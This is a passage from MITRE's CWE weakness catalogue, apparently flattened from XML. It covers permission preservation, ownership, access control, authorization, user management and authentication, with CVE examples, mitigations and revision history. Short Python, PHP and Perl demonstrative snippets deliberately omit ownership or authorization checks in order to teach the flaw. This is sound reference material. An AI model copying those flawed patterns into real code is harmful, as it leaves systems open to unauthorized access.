MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Handle Insufficient Permissions or Privileges + + + + The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended. + + + + + + + Resultant + This is resultant from errors that prevent the permissions from being preserved. + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + CVE-2002-2323 + Incorrect ACLs used when restoring backups from directories that use symbolic links. + https://www.cve.org/CVERecord?id=CVE-2002-2323 + + + CVE-2001-1515 + Automatic modification of permissions inherited from another file system. + https://www.cve.org/CVERecord?id=CVE-2001-1515 + + + CVE-2005-1920 + Permissions on backup file are created with defaults, possibly less secure than original file. + https://www.cve.org/CVERecord?id=CVE-2005-1920 + + + CVE-2001-0195 + File is made world-readable when being cloned. + https://www.cve.org/CVERecord?id=CVE-2001-0195 + + + + + Permission preservation failure + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Permission Preservation Failure + + + + The product assigns the wrong ownership, or does not properly verify the ownership, of an object or resource. + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + + + CVE-1999-1125 + Program runs setuid root but relies on a configuration file owned by a non-root user. + https://www.cve.org/CVERecord?id=CVE-1999-1125 + + + + File or Directory + + + + Ownership errors + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Ownership Issues + + + + The product does not properly verify that a critical resource is owned by the proper entity. + + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Gain Privileges or Assume Identity + An attacker could gain unauthorized access to system resources. + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource. + + + + + This function is part of a privileged program that takes input from users with potentially lower privileges. + + def killProcess(processID):os.kill(processID, signal.SIGKILL) + + + This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes. + This function remedies the problem by checking the owner of the process before killing it: + + def killProcess(processID): + user = getCurrentUser() + + #Check process owner against requesting user + if getProcessOwner(processID) == user:os.kill(processID, signal.SIGKILL)return + else:print("You cannot kill a process you don't own")return + + + + + + + + + CVE-2001-0178 + Program does not verify the owner of a UNIX socket that is used for sending a password. + https://www.cve.org/CVERecord?id=CVE-2001-0178 + + + CVE-2004-2012 + Owner of special device not checked, allowing root. + https://www.cve.org/CVERecord?id=CVE-2004-2012 + + + + + Unverified Ownership + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This overlaps insufficient comparison, verification errors, permissions, and privileges. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. + + Access control involves the use of several protection mechanisms such as: + + Authentication (proving the identity of an actor) + Authorization (ensuring that a given actor can access a resource), and + Accountability (tracking of activities that were performed) + + When any mechanism is not applied or otherwise fails, attackers can compromise the security of the product by gaining privileges, reading sensitive information, executing commands, evading detection, etc. + There are two distinct behaviors that can introduce access control weaknesses: + + Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for either the user or the resource (for example, setting a password file to be world-writable, or giving administrator capabilities to a guest user). This action could be performed by the program or the administrator. + Enforcement: the mechanism contains errors that prevent it from properly enforcing the specified access control requirements (e.g., allowing the user to specify their own privileges, or allowing a syntactically-incorrect ACL to produce insecure settings). This problem occurs within the program itself, in that it does not actually enforce the intended security policy that the administrator specifies. + + + + + + + + + Authorization + The terms "access control" and "authorization" are often used interchangeably, although many people have distinct definitions. The CWE usage of "access control" is intended as a general term for the various mechanisms that restrict which users can access which resources, and "authorization" is more narrowly defined. It is unlikely that there will be community consensus on the use of these terms. + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Other + Varies by Context + + + + + Architecture and Design + Operation + Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + CVE-2022-29238 + Access-control setting in web-based document collaboration tool is not properly implemented by the code, which prevents listing hidden directories but does not prevent direct requests to files in those directories. + https://www.cve.org/CVERecord?id=CVE-2022-29238 + + + CVE-2022-23607 + Python-based HTTP library did not scope cookies to a particular domain such that "supercookies" could be sent to any domain on redirect + https://www.cve.org/CVERecord?id=CVE-2022-23607 + + + CVE-2021-21972 + Chain: Cloud computing virtualization platform does not require authentication for upload of a tar format file (CWE-306), then uses .. path traversal sequences (CWE-23) in the file to access unexpected files, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21972 + + + CVE-2021-37415 + IT management product does not perform authentication for some REST API requests, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-37415 + + + CVE-2020-13927 + Default setting in workflow management product allows all API requests without authentication, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-13927 + + + CVE-2010-4624 + Bulletin board applies restrictions on number of images during post creation, but does not enforce this on editing. + https://www.cve.org/CVERecord?id=CVE-2010-4624 + + + + File or Directory + + + + Access Control List (ACL) errors + + + 2 + Insufficient Authorization + + + Missing Access Control + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-284 is extremely high-level, a Pillar. Its name, "Improper Access Control," is often misused in low-information vulnerability reports [REF-1287] or by active use of the OWASP Top Ten, such as "A01:2021-Broken Access Control". It is not useful for trend analysis. + Consider using descendants of CWE-284 that are more specific to the kind of access control involved, such as those involving authorization (Missing Authorization (CWE-862), Incorrect Authorization (CWE-863), Incorrect Permission Assignment for Critical Resource (CWE-732), etc.); authentication (Missing Authentication (CWE-306) or Weak Authentication (CWE-1390)); Incorrect User Management (CWE-286); Improper Restriction of Communication Channel to Intended Endpoints (CWE-923); etc. + + + + + + + + + + + + + + + + This entry needs more work. Possible sub-categories include: + + Trusted group includes undesired entities (partially covered by CWE-286) + Group can perform undesired actions + ACL parse error does not fail closed + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Alternate_Terms, Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-24 + Critical + Changed name and description; clarified difference between "access control" and "authorization." + + + CWE Content Team + MITRE + 2011-03-29 + updated Alternate_Terms, Background_Details, Description, Maintenance_Notes, Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Modes_of_Introduction, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Access Control Issues + Access Control (Authorization) Issues + + + + The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. + + Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. + When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. + + + + + + + + + + + + An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object. + + + + AuthZ + "AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is distinct from "AuthN" (or, sometimes, "AuthC") which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. + + + + + Implementation + + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies. + + + + Architecture and Design + + Authorization weaknesses may arise when a single-user application is ported to a multi-user environment. + + + + Operation + + + High + + + Confidentiality + Read Application Data + Read Files or Directories + An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data. + + + Integrity + Modify Application Data + Modify Files or Directories + An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data. + + + Access Control + Gain Privileges or Assume Identity + An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality. + + + + + Automated Static Analysis + + Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries. + Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives. + + Limited + + + Automated Dynamic Analysis + Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms. + + Moderate + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints. + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host Application Interface Scanner + Fuzz Tester + Framework-based Fuzzer + Forced Path Execution + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + + Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries. + Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role. + + + + Architecture and Design + Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]. + + + + Architecture and Design + + For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page. + One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page. + + + + System Configuration + Installation + Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs. + + + + + This function runs an arbitrary SQL query on a given database, returning the result of the query. + + function runEmployeeQuery($dbName, $name){mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); + //Use a prepared statement to avoid CWE-89 + $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');$preparedStatement->execute(array(':name' => $name));return $preparedStatement->fetchAll();} + /.../ + + $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); + + While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. + + + The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory. + + sub DisplayPrivateMessage {my($id) = @_;my $Message = LookupMessageObject($id);print "From: " . encodeHTML($Message->{from}) . "<br>\n";print "Subject: " . encodeHTML($Message->{subject}) . "\n";print "<hr>\n";print "Body: " . encodeHTML($Message->{body}) . "\n";} + my $q = new CGI; + # For purposes of this example, assume that CWE-309 and + + + + # CWE-523 do not apply. + if (! AuthenticateUser($q->param('username'), $q->param('password'))) {ExitError("invalid username or password");} + my $id = $q->param('id');DisplayPrivateMessage($id); + + While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users. + One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user. + + + + + CVE-2022-24730 + Go-based continuous deployment product does not check that a user has certain privileges to update or create an app, allowing adversaries to read sensitive repository information + https://www.cve.org/CVERecord?id=CVE-2022-24730 + + + CVE-2009-3168 + Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords. + https://www.cve.org/CVERecord?id=CVE-2009-3168 + + + CVE-2009-2960 + Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users. + https://www.cve.org/CVERecord?id=CVE-2009-2960 + + + CVE-2009-3597 + Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request. + https://www.cve.org/CVERecord?id=CVE-2009-3597 + + + CVE-2009-2282 + Terminal server does not check authorization for guest access. + https://www.cve.org/CVERecord?id=CVE-2009-2282 + + + CVE-2009-3230 + Database server does not use appropriate privileges for certain sensitive operations. + https://www.cve.org/CVERecord?id=CVE-2009-3230 + + + CVE-2009-2213 + Gateway uses default "Allow" configuration for its authorization settings. + https://www.cve.org/CVERecord?id=CVE-2009-2213 + + + CVE-2009-0034 + Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2009-0034 + + + CVE-2008-6123 + Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect. + https://www.cve.org/CVERecord?id=CVE-2008-6123 + + + CVE-2008-5027 + System monitoring software allows users to bypass authorization by creating custom forms. + https://www.cve.org/CVERecord?id=CVE-2008-5027 + + + CVE-2008-7109 + Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client. + https://www.cve.org/CVERecord?id=CVE-2008-7109 + + + CVE-2008-3424 + Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access. + https://www.cve.org/CVERecord?id=CVE-2008-3424 + + + CVE-2009-3781 + Content management system does not check access permissions for private files, allowing others to view those files. + https://www.cve.org/CVERecord?id=CVE-2009-3781 + + + CVE-2008-4577 + ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions. + https://www.cve.org/CVERecord?id=CVE-2008-4577 + + + CVE-2008-6548 + Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files. + https://www.cve.org/CVERecord?id=CVE-2008-6548 + + + CVE-2007-2925 + Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries. + https://www.cve.org/CVERecord?id=CVE-2007-2925 + + + CVE-2006-6679 + Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header. + https://www.cve.org/CVERecord?id=CVE-2006-6679 + + + CVE-2005-3623 + OS kernel does not check for a certain privilege before setting ACLs for files. + https://www.cve.org/CVERecord?id=CVE-2005-3623 + + + CVE-2005-2801 + Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied. + https://www.cve.org/CVERecord?id=CVE-2005-2801 + + + CVE-2001-1155 + Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. + https://www.cve.org/CVERecord?id=CVE-2001-1155 + + + + + Missing Access Control + + + A10 + Failure to Restrict URL Access + CWE More Specific + + + A2 + Broken Access Control + CWE More Specific + + + SFP35 + Insecure resource access + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-285 is high-level and lower-level CWEs can frequently be used instead. It is a level-1 Class (i.e., a child of a Pillar). + Look at CWE-285's children and consider mapping to CWEs such as CWE-862: Missing Authorization, CWE-863: Incorrect Authorization, CWE-732: Incorrect Permission Assignment for Critical Resource, or others. + + + + + + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Type + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Description + + + CWE Content Team + MITRE + 2011-03-24 + Critical + Changed name and description; clarified difference between "access control" and "authorization." + + + CWE Content Team + MITRE + 2011-03-29 + updated Background_Details, Demonstrative_Examples, Description, Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing or Inconsistent Access Control + Improper Access Control (Authorization) + + + + The product does not properly manage a user within its environment. + Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Other + Varies by Context + + + + + User management errors + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693). + This item needs more work. Possible sub-categories include: user in wrong group, and user with insecure profile or "configuration". It also might be better expressed as a category than a weakness. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Applicable_Platforms, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + User Management Issues + + + + When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct. + + + + + + + + + + + authentification + An alternate term is "authentification", which appears to be most commonly used by people from non-English-speaking countries. + + + AuthN + "AuthN" is typically used as an abbreviation of "authentication" within the web application security community. It is also distinct from "AuthZ," which is an abbreviation of "authorization." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. + + + AuthC + "AuthC" is used as an abbreviation of "authentication," but it appears to used less frequently than "AuthN." + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Integrity + Confidentiality + Availability + Access Control + Read Application Data + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code. + + + + + Automated Static Analysis + + Automated static analysis is useful for detecting certain types of authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries. + Generally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an established identity; an automated 